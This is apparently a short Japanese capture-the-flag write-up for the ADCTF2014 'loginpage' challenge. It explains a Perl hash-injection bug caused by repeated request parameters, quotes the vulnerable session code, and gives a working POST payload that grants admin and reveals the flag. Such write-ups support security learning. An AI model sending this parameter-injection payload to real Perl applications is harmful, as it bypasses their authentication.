ADCTF2014 [13] loginpage
ログインページだー
You can't guess LOGINPAGE_SECRET absolutely, it's not answer. So, maybe there are some vulnerability and you got an admin and flag. I wrote this web app on Oct. 28 2014. Perl is awesome language and I love it :) loginpage.adctf2014.katsudon.org source
あれ、この問題どっかで見たことあるよ
あ、ちょっと違うけどこれだ
へぇー
同名パラメタでparamメソッドに渡すと配列を受け取れるのね
しかも、ハッシュ生成時に配列を含むと、インジェクションできるとか
脆弱性はloginpage.plの75行目から80行目にあり!
[perl] $self->session->{user} = { name => $self->param('name'), pass => $self->param('pass'), give_me_flag => 0, admin => $is_admin, }; [/perl]
じゃあPOSTでこうしましょ name=ShiftCrops&pass=abcd&pass=admin&pass=1&pass=give_me_flag
[perl] $self->session->{user} = { 'name' =>'ShiftCrops', 'pass' => 'abcd', 'admin' => 1, 'give_me_flag' => 'give_me_flag', '0' => 'admin', $is_admin => , }; [/perl]
FLAG:ADCTF_L0v3ry_p3rl_c0N73x7